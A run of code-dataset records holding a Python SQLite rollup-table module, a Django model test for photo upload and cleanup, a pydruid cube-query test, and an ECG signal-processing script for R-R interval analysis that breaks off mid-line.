SELECT c.region_id || '-' || \n s.{constants.ID_COLUMN_NAME} new_id, \n s.{constants.ID_COLUMN_NAME} {constants.SEGMENT_ID_COLUMN_NAME}, \n d.*\n \n FROM {self.input_table_name} as d, \n {constants.STARS_DB}.{constants.BUSINESS_CODES_TABLE} b, \n {constants.STARS_DB}.{constants.COUNTIES_TABLE} c,\n {constants.STARS_DB}.{constants.SEGMENTS_TABLE} s,\n {constants.STARS_DB}.{constants.JURISDICTIONS_TABLE} j\n \n WHERE d.{constants.BUSINESS_CODE_ID_COLUMN_NAME}\n =b.{constants.ID_COLUMN_NAME}\n AND b.{constants.SEGMENT_ID_COLUMN_NAME}\n =s.{constants.ID_COLUMN_NAME}\n AND d.{constants.TAC_COLUMN_NAME}\n =j.{constants.TAC_COLUMN_NAME}\n AND j.{constants.COUNTY_ID_COLUMN_NAME}\n =c.{constants.ID_COLUMN_NAME}\n '''\n \n self.rollup_id_name = constants.SEGMENT_ID_COLUMN_NAME\n \n self.rollup_table_name = 'segment_totals_region'\n \n self.start()\n \n \nclass CategoryTotals(RollupTotals):\n '''\n Creates the \"category_totals\" table in the \"statewide_datasets\"\n database. The table contains the amounts from the \n \"business_code_totals\" table also in \"statewide_datasets\" rolled up by\n \"category_id\". The \"category_id\" comes from the \"segments\" table in \n \"starsdb\" based on the \"segment_id\" that comes from the \"business_codes\" \n table also in \"starsdb\". The \"segment_id\" is based on the \n \"business_code_id\" in the \"business_code_totals\" table.\n '''\n \n \n def __init__(self, is_addon=False):\n super().__init__(is_addon, is_category=True)\n \n self.title += ' - Category Totals'\n \n self.query = f'''\n SELECT d.{constants.TAC_COLUMN_NAME} || '-' || \n c.{constants.ID_COLUMN_NAME} as new_id, \n c.{constants.ID_COLUMN_NAME} as \n {constants.CATEGORY_ID_COLUMN_NAME}, d.* \n \n FROM {self.input_table_name} as d, \n {constants.STARS_DB}.{constants.BUSINESS_CODES_TABLE} as b, \n {constants.STARS_DB}.{constants.CATEGORIES_TABLE} as c, \n {constants.STARS_DB}.{constants.SEGMENTS_TABLE} as s \n \n WHERE d.{constants.BUSINESS_CODE_ID_COLUMN_NAME}\n =b.{constants.ID_COLUMN_NAME}\n AND b.{constants.SEGMENT_ID_COLUMN_NAME}\n =s.{constants.ID_COLUMN_NAME} \n AND s.{constants.CATEGORY_ID_COLUMN_NAME}\n =c.{constants.ID_COLUMN_NAME}\n '''\n \n self.rollup_id_name = constants.CATEGORY_ID_COLUMN_NAME\n \n self.rollup_table_name = 'category_totals'\n \n self.start()\n \n \nclass CategoryTotalsRegion(RollupTotals):\n '''\n Creates the \"category_totals_region\" table in the \"statewide_datasets\"\n database. The table contains the amounts from the \n \"business_code_totals\" table also in \"statewide_datasets\" rolled up \n by \"category_id\" and \"region_id\". The \"category_id\" comes from the \n \"segments\" table in \"starsdb\" based on the \"segment_id\" that comes \n from the \"business_codes\" table also in \"starsdb\". The \"segment_id\" \n is based on the \"business_code_id\" in the \"business_code_totals\" \n table. The \"region_id\" comes from the \"jurisdictions\" table in \n \"starsdb\". \n '''\n \n \n def __init__(self):\n super().__init__(is_region=True)\n \n self.title += ' - Category Totals Region'\n \n self.query = f'''\n SELECT co.region_id || '-' || \n c.{constants.ID_COLUMN_NAME} new_id, \n c.{constants.ID_COLUMN_NAME} {constants.CATEGORY_ID_COLUMN_NAME}, \n d.* \n \n FROM {self.input_table_name} d, \n {constants.STARS_DB}.{constants.BUSINESS_CODES_TABLE} b, \n {constants.STARS_DB}.{constants.COUNTIES_TABLE} co,\n {constants.STARS_DB}.{constants.CATEGORIES_TABLE} c, \n {constants.STARS_DB}.{constants.SEGMENTS_TABLE} s, \n {constants.STARS_DB}.{constants.JURISDICTIONS_TABLE} j\n \n WHERE d.{constants.BUSINESS_CODE_ID_COLUMN_NAME}\n =b.{constants.ID_COLUMN_NAME} \n AND b.{constants.SEGMENT_ID_COLUMN_NAME}\n =s.{constants.ID_COLUMN_NAME} \n AND s.{constants.CATEGORY_ID_COLUMN_NAME}\n =c.{constants.ID_COLUMN_NAME}\n AND d.{constants.TAC_COLUMN_NAME}\n =j.{constants.TAC_COLUMN_NAME}\n AND j.{constants.COUNTY_ID_COLUMN_NAME}\n =co.{constants.ID_COLUMN_NAME}\n '''\n \n self.rollup_id_name = constants.CATEGORY_ID_COLUMN_NAME\n \n self.rollup_table_name = 'category_totals_region'\n \n self.start()\n \n \nclass BusinessCodeTotalsRegion(RollupTotals):\n '''\n Creates the \"business_code_totals_region\" table in the \n \"statewide_datasets\" database. The table contains the amounts from \n the \"business_code_totals\" table also in the \"statewide_datasets\" \n rolled up by \"region_id\". The \"region_id\" comes form the \n \"jurisdictions\" table in \"starsdb\".\n '''\n \n \n def __init__(self):\n super().__init__(is_region=True, is_business_code_totals=True)\n \n self.title += ' - Business Code Totals Region'\n \n self.query = f'''\n SELECT co.region_id || '-' || \n d.{constants.BUSINESS_CODE_ID_COLUMN_NAME} new_id, \n d.* \n \n FROM {self.input_table_name} d, \n {constants.STARS_DB}.{constants.COUNTIES_TABLE} co,\n {constants.STARS_DB}.{constants.JURISDICTIONS_TABLE} j\n \n WHERE d.{constants.TAC_COLUMN_NAME}\n =j.{constants.TAC_COLUMN_NAME}\n AND j.{constants.COUNTY_ID_COLUMN_NAME}\n =co.{constants.ID_COLUMN_NAME}\n '''\n \n self.rollup_id_name = constants.BUSINESS_CODE_ID_COLUMN_NAME\n \n self.rollup_table_name = 'business_code_totals_region'\n \n self.start()\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n", "sub_path": "rolluptotals.py", "file_name": "rolluptotals.py", "file_ext": "py", "file_size_in_byte": 15103, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "threading.Thread", "line_number": 17, "usage_type": "attribute"}, {"api_name": "constants.APP_NAME", "line_number": 41, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_TOTALS_TABLE", "line_number": 43, "usage_type": "attribute"}, {"api_name": "constants.ADDON_SUFFIX", "line_number": 46, "usage_type": "attribute"}, {"api_name": "constants.ADDON_SUFFIX", "line_number": 57, "usage_type": "attribute"}, {"api_name": "progress.Progress", "line_number": 59, "usage_type": "call"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 71, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 76, "usage_type": "attribute"}, {"api_name": "constants.REGION_ID_COLUMN_NAME", "line_number": 86, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 87, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 93, "usage_type": "attribute"}, {"api_name": "constants.DB_PATHS", "line_number": 114, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 114, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 116, "usage_type": "call"}, {"api_name": "constants.DB_PATHS", "line_number": 117, "usage_type": "attribute"}, {"api_name": "constants.STATEWIDE_DATASETS_DB", "line_number": 117, "usage_type": "attribute"}, {"api_name": "constants.DB_TIMEOUT", "line_number": 118, "usage_type": "attribute"}, {"api_name": "utilities.execute_sql", "line_number": 121, "usage_type": "call"}, {"api_name": "utilities.execute_sql", "line_number": 126, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 135, "usage_type": "call"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 144, "usage_type": "attribute"}, {"api_name": "constants.REGION_ID_COLUMN_NAME", "line_number": 150, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 159, "usage_type": "attribute"}, {"api_name": "constants.REGION_ID_COLUMN_NAME", "line_number": 162, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 178, "usage_type": "call"}, {"api_name": "constants.DB_PATHS", "line_number": 179, "usage_type": "attribute"}, {"api_name": "constants.STATEWIDE_DATASETS_DB", "line_number": 179, "usage_type": "attribute"}, {"api_name": "constants.DB_TIMEOUT", "line_number": 180, "usage_type": "attribute"}, {"api_name": "sqlite3.OperationalError", "line_number": 190, "usage_type": "attribute"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 191, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 191, "usage_type": "name"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 213, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 214, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 215, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 215, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 219, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODES_TABLE", "line_number": 219, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 220, "usage_type": "attribute"}, {"api_name": "constants.SEGMENTS_TABLE", "line_number": 220, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 222, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 223, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 224, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 225, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 228, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 254, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 255, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 255, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 259, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODES_TABLE", "line_number": 259, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 260, "usage_type": "attribute"}, {"api_name": "constants.COUNTIES_TABLE", "line_number": 260, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 261, "usage_type": "attribute"}, {"api_name": "constants.SEGMENTS_TABLE", "line_number": 261, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 262, "usage_type": "attribute"}, {"api_name": "constants.JURISDICTIONS_TABLE", "line_number": 262, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 264, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 265, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 266, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 267, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 268, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 269, "usage_type": "attribute"}, {"api_name": "constants.COUNTY_ID_COLUMN_NAME", "line_number": 270, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 271, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 274, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 299, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 300, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 301, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 302, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 305, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODES_TABLE", "line_number": 305, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 306, "usage_type": "attribute"}, {"api_name": "constants.CATEGORIES_TABLE", "line_number": 306, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 307, "usage_type": "attribute"}, {"api_name": "constants.SEGMENTS_TABLE", "line_number": 307, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 309, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 310, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 311, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 312, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 313, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 314, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 317, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 345, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 346, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 346, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 350, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODES_TABLE", "line_number": 350, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 351, "usage_type": "attribute"}, {"api_name": "constants.COUNTIES_TABLE", "line_number": 351, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 352, "usage_type": "attribute"}, {"api_name": "constants.CATEGORIES_TABLE", "line_number": 352, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 353, "usage_type": "attribute"}, {"api_name": "constants.SEGMENTS_TABLE", "line_number": 353, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 354, "usage_type": "attribute"}, {"api_name": "constants.JURISDICTIONS_TABLE", "line_number": 354, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 356, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 357, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 358, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 359, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 360, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 361, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 362, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 363, "usage_type": "attribute"}, {"api_name": "constants.COUNTY_ID_COLUMN_NAME", "line_number": 364, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 365, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 368, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 392, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 396, "usage_type": "attribute"}, {"api_name": "constants.COUNTIES_TABLE", "line_number": 396, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 397, "usage_type": "attribute"}, {"api_name": "constants.JURISDICTIONS_TABLE", "line_number": 397, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 399, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 400, "usage_type": "attribute"}, {"api_name": "constants.COUNTY_ID_COLUMN_NAME", "line_number": 401, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 402, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 405, "usage_type": "attribute"}]} +{"seq_id": "270111986", "text": "# -*- coding: utf-8 -*-\r\nfrom django.test import TestCase\r\nfrom apps.hello.models import Person\r\nfrom django.test.utils import override_settings\r\nfrom django.core.files.uploadedfile import SimpleUploadedFile\r\nimport os\r\nfrom django.conf import settings\r\nimport shutil\r\n\r\n\r\n@override_settings(MEDIA_ROOT=settings.MEDIA_TEST_ROOT)\r\nclass PersonModelTest(TestCase):\r\n\r\n def setUp(self):\r\n self.test_person = Person.objects.first()\r\n self.test_img_path = os.path.join(\r\n settings.BASE_DIR,\r\n 'assets/img/test_image.png'\r\n )\r\n with open(self.test_img_path, 'rb') as test_img:\r\n self.test_image_1 = SimpleUploadedFile(\r\n name='test_image_1.png',\r\n content=test_img.read(),\r\n content_type='image/png'\r\n )\r\n self.test_person.photo = self.test_image_1\r\n self.test_person.save()\r\n self.first_photo_file = self.test_person.photo.path\r\n\r\n def tearDown(self):\r\n test_dir = os.path.exists(settings.MEDIA_TEST_ROOT)\r\n if test_dir:\r\n shutil.rmtree(settings.MEDIA_TEST_ROOT)\r\n\r\n def test_save_method(self):\r\n \"\"\"Check, if model save method,\r\n save first person photo to proper filesystem path,\r\n and crop image to proper size\"\"\"\r\n self.assertTrue(os.path.exists(self.first_photo_file))\r\n self.assertEqual(\r\n self.first_photo_file,\r\n settings.MEDIA_TEST_ROOT + self.test_person.photo.name\r\n )\r\n self.assertTrue(\r\n self.test_person.photo.width <= 200 and\r\n self.test_person.photo.height <= 200\r\n )\r\n\r\n def test_save_method_remove_unused_img(self):\r\n \"\"\"Check, if model save method delete unused images\"\"\"\r\n with open(self.test_img_path, 'rb') as test_img:\r\n self.test_image_2 = SimpleUploadedFile(\r\n name='test_image_2.png',\r\n content=test_img.read(),\r\n content_type='image/png'\r\n )\r\n self.test_person.photo = self.test_image_2\r\n self.test_person.save()\r\n self.second_photo_file = self.test_person.photo.path\r\n self.assertTrue(os.path.exists(self.second_photo_file))\r\n self.assertFalse(os.path.exists(self.first_photo_file))\r\n", "sub_path": "apps/hello/tests/test_models.py", "file_name": "test_models.py", "file_ext": "py", "file_size_in_byte": 2300, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.test.TestCase", "line_number": 12, "usage_type": "name"}, {"api_name": "apps.hello.models.Person.objects.first", "line_number": 15, "usage_type": "call"}, {"api_name": "apps.hello.models.Person.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "apps.hello.models.Person", "line_number": 15, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.conf.settings.BASE_DIR", "line_number": 17, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 17, "usage_type": "name"}, {"api_name": "django.core.files.uploadedfile.SimpleUploadedFile", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.conf.settings.MEDIA_TEST_ROOT", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 31, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 33, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_TEST_ROOT", "line_number": 33, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 33, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.conf.settings.MEDIA_TEST_ROOT", "line_number": 42, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 42, "usage_type": "name"}, {"api_name": "django.core.files.uploadedfile.SimpleUploadedFile", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "django.test.utils.override_settings", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_TEST_ROOT", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "168907501", "text": "import os\nimport pytest\nfrom pydruid.client import PyDruid\nfrom pydruid.utils.aggregators import doublesum\nfrom pydruid.utils.filters import Dimension\n\nclass TestCube:\n def test_cube_query(self):\n \tquery = PyDruid(\"http://pipeline.qiniu.com\", 'v2/stream/cubes/query')\n \tquery.set_qiniu(\"\", \"\")\n \ttop = query.topn(\n \t\t\tdatasource='domain_top_statics',\n \t\t\tgranularity='all',\n \t\t\tintervals='2019-08-13/pt1h', # utc time of 2014 oscars\n \t\t\taggregations={'count': doublesum('count')},\n \t\t\tmetric='count',\n \t\t\tdimension='Country',\n \t\t\tthreshold=10)\n \tdf = query.export_pandas()\n \tprint(df)\n \ttop.export_tsv('top.tsv')\n \n", "sub_path": "tests/test_qiniu.py", "file_name": "test_qiniu.py", "file_ext": "py", "file_size_in_byte": 665, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pydruid.client.PyDruid", "line_number": 9, "usage_type": "call"}, {"api_name": "pydruid.utils.aggregators.doublesum", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "653101139", "text": "# This script helps to plot ECG signals. \n\nimport pandas as pd\nfrom plotly import graph_objs\nfrom plotly import tools\nfrom plotly.offline import plot\nfrom django.conf import settings\n\nfrom scipy import signal\nfrom scipy.signal import find_peaks_cwt\nfrom numpy import polyfit\nimport numpy as np\nimport math\n\nfrom .detect_peaks import detect_peaks\n\ndef frange(x, y, jump):\n '''\n Crea una lista de numeros para la division\n de la senal por ploques de jump segundos\n '''\n while x < y:\n yield x\n x += jump\n\n\ndef signal_processing(file_name, divide_plots=False):\n\n print('***************************************************')\n print('---------------------------------------------------')\n\n ## ---------------- Datos de Eventos PLOTS ---------------\n tiempos_plots = []\n bpm_plots = []\n x_plots = []\n y_plots = []\n rrmean_values_plots = []\n rr_variability_plots = []\n rrmean_plots = []\n rr_variabilitysum_plots = []\n\n ## ---------------- Se adquiere la senal -----------------\n path = '/data/'\n df = pd.read_csv(settings.MEDIA_ROOT+path+file_name)\n\n try:\n x=df['X']\n y=df['Y']\n except:\n df = pd.read_csv(settings.MEDIA_ROOT+path+file_name, sep=';')\n\n x=df['X']\n y=df['Y']\n \n # Frecuencia de Muestro\n Fs = 300\n rateBPM = 60\n\n ## ---------- ACONDICIONAMIENTO DE LOS VALORES X ----------\n # Entre 1000, porque asi son dados los valores\n x = np.array(x)\n y = np.array(y)\n # Para empezar en el segundo 5\n try:\n x = x[1500:10000]\n y = y[1500:10000]\n except:\n pass\n x = (x/1000.0)-1 # Para empezar desde 0 segundos\n y = y/1000.0\n \n # Inicio de muestra (segundos)\n x_inicio1 = x[0]\n x_decimal = x_inicio1-math.floor(x_inicio1)\n x_inicio = (x_decimal * 0.999) / 0.299 + math.floor(x_inicio1) \n # Final de muestra (segundos)\n x_final1 = x[-1]\n x_decimal_fin = x_final1 - math.floor(x_final1)\n x_final = (x_decimal_fin * 0.999) / 0.299 + math.floor(x_final1) \n \n # TIEMPO Total de la SENAL\n tiempo_total = x_final - x_inicio\n\n # Formamos el axis x (segundos) (CON ESTO PROCESAMOS)\n t = np.linspace(x_inicio, x_final, y.size, endpoint=True)\n # El Y para PLOT (y_final)\n y_final = []\n\n ## -------------------- Datos ---------------------\n # BPM (Latidos por MINUTO (60 segundos))\n taquicardia = 100.0 # Mayor que\n bradicardia = 60.0 # Menor que\n # Separacion de PICOS (1 Hz - 1.667 Hz (2 Hz))\n taquicardia_seg = 60/taquicardia # Menor que 0.6 segundos\n bradicardia_seg = 60/bradicardia # Mayor que 1.0 segundos\n # En milisegundos\n taquicardia_mili = 600.0 # Menor que 600 milisegundos\n bradicardia_mili = 1000.0 # Mayor que 1000 milisegundos\n\n ## ------------- CONVERSION DE BITS --------------- \n num_bits = 12.0\n max_volt = 3.3\n y = (max_volt * y)/(2^int(num_bits))\n #--------------------------------------------------\n\n ## --------------- PROCESAMIENTO -----------------\n # Por encima de 10 segundos (tiempo total)\n segundos_bloque = 15.0\n sobra_bloque = tiempo_total/segundos_bloque\n bloques = list(frange(x_inicio, x_final, segundos_bloque))\n\n # contador de figuras\n cont_fig = 2\n\n # ultimo loop\n last_loop = False\n\n # Para R-R\n rr_values_all = []\n rr_values_all_plot = []\n rr_mean_values_all = []\n rrmean_values = []\n rr_mean_prom = 0\n rr_up_mean_values_all = []\n rr_down_mean_values_all = []\n RRv_all = []\n RRv_all_plot=[]\n rr_mean = 0\n RRv_suma_all = []\n\n # Para saber si plotear ultima parte\n ploteosiono = False\n\n y_peaks=[]\n t_peaks = []\n picos_todos = []\n \n ## Resultado\n values = {'FA': False, 'ARRITMIA': False, 'ARRITMIA_GENERAL': False}\n values['suficiente_tiempo'] = True\n\n # PROCESAMIENTO:\n if tiempo_total > segundos_bloque: # Por encima de 10 segundos (tiempo total)\n for i in bloques:\n # EVITAR bloque menor a 5 segundos\n ultimate_i = i + segundos_bloque # Proximo bloque\n if (ultimate_i < x_final) and ((x_final-ultimate_i) < (segundos_bloque/2)):\n\n # Datos de BLOQUE\n indice_mayores = (i <= t) \n t_bloque_parcial = t[indice_mayores] # Para t\n y_bloque_parcial = y[indice_mayores] # Para y\n indice_menores = (t_bloque_parcial <= x_final)\n t_bloque = t_bloque_parcial[indice_menores] # Para t\n y_bloque = y_bloque_parcial[indice_menores] # Para y\n \n\n last_loop = True\n else:\n # Datos de BLOQUE\n indice_mayores = (i <= t)\n t_bloque_parcial = t[indice_mayores] # Para t\n y_bloque_parcial = y[indice_mayores] # Para y\n indice_menores = (t_bloque_parcial <= (i + segundos_bloque))\n t_bloque = t_bloque_parcial[indice_menores] # Para t\n y_bloque = y_bloque_parcial[indice_menores] # Para y\n\n \n # Filtro SALVITZKY para reducir ruido (y_smooth)\n order_sgolay = 7\n framelen = 21\n # Asegurar que la cantidad de y_bloque es mayor que framelen\n if not(len(y_bloque) > framelen):\n order_sgolay = len(y_bloque)-2\n framelen = len(y_bloque)-1\n # Solo is es odd (impar) : order_sgolay < framelen\n if (framelen%2) != 1:\n order_sgolay = order_sgolay-1;\n framelen = framelen-1\n print('Se cambio el orden de Savitzky Golay\\n')\n \n y_smooth = signal.savgol_filter(y_bloque, framelen, order_sgolay)\n \n\n # DETREND (Quitar la tendecia de la senal) (y_detrend)\n p = polyfit((np.arange(len(y_smooth))),y_smooth,6)\n f_y = np.polyval(p,(np.arange(len(y_smooth))))\n y_detrend = y_smooth - f_y\n\n\n # MULTIPLICACION por si misma\n y_var = y_detrend * y_detrend\n y_var = y_var * 100 # 10 (valor a milivoltios)\n y_normal = y_var\n\n\n # DETECCION de PICOS\n y_max = max(y_normal)\n\n # umbral minimo del pico de la senal\n min_peak_value = y_max*0.4\n \n # umbral minimo de pico (TEORICO)\n min_peak_value_theory = 0.2\n # Los picos deben ser si o si mayores a 0.29\n if not(min_peak_value >= min_peak_value_theory):\n print('El pico minimio es menor a '+str(min_peak_value_theory))\n min_peak_value = min_peak_value_theory\n # Picos: valores\n index_peaks = detect_peaks(y_normal, mph=min_peak_value, mpd=0.3, show=True) # primer valor probado 0.150\n \n if index_peaks == []:\n break \n t_peaks = t_bloque[index_peaks] \n y_peaks = y_normal[index_peaks]\n\n #Colocar todos los picos:\n for peak in y_peaks:\n picos_todos.append(peak)\n \n # RR-VARIABILITY\n RRv_suma = 0\n RRv_variamucho = False\n minimo_variacion = 0.6 ##CAMBIAR? por el momento bien 0.6 1.5\n porcentaje_prematuridad = 0.78\n\n # RR - INTERVALOS\n rr_values = []\n rr_promedio = 0\n RRv_suma_porcentaje = []\n # RR-MEAN\n fuerade_rrmean = False\n\n # MINIMO 10 picos\n if (len(y_peaks)> 9):\n # RR - VARIABILITY\n for i2 in range(len(y_peaks)-2):\n # No deberia haber variacion (RRv = 0)\n RRv21 = (t_peaks[i2+1]-t_peaks[i2])\n RRv32 = (t_peaks[i2+2]-t_peaks[i2+1])\n RRv_suma = RRv_suma + abs(RRv32 - RRv21)\n RRv_suma_all.append(abs(RRv32 - RRv21)) #Plots\n\n # Porcentaje\n if (1-(abs(RRv21-RRv32)/(RRv21))):\n RRv_suma_porcentaje.append(abs(RRv32 - RRv21))\n\n if RRv_suma > minimo_variacion:\n RRv_variamucho = True\n \n\n # RR - INTERVALOS (segundos)\n for i3 in range(1,len(t_peaks)):\n # se guarda valor intervalo RR\n pulso_ant = t_peaks[i3-1]\n pulso_act = t_peaks[i3]\n rr_values.append(pulso_act - pulso_ant)\n \n # de RRv para plot!!\n RRv_hahas = [RRv_suma]*len(rr_values) ## REVISAR DESCOMENTAR\n #RRv_hahas = RRv_suma_sola*len(rr_values) \n for RRv_haha in RRv_hahas:\n RRv_all.append(RRv_haha)\n \n \n rr_suma = sum(rr_values)\n rr_promedio = sum(rr_values)/len(t_peaks)\n \n # Asignamos al rr_values total\n for rr_val in rr_values: ## REVISAR!!\n rr_values_all.append(rr_val)\n \n # MEAN R-R Interval (se toma rr_values anterior)\n rr_mean = 0\n for i4 in range(0,len(rr_values)):\n rr_mean = 0.75*rr_mean+0.25*rr_values[i4]\n rrmean_values = [rr_mean]*len(rr_values)\n # Asignamos al rr_mean valores totales\n for rrmean_value in rrmean_values:\n rr_mean_values_all.append(rrmean_value)\n\n # Valores R-R Limites\n up_rr_true = [] # Los valores mayores a \n up_mean_rrvalues = [i21 for i21 in rr_values if i21 >= (rr_mean*1.35)] #2.5+0.5##ESSTO 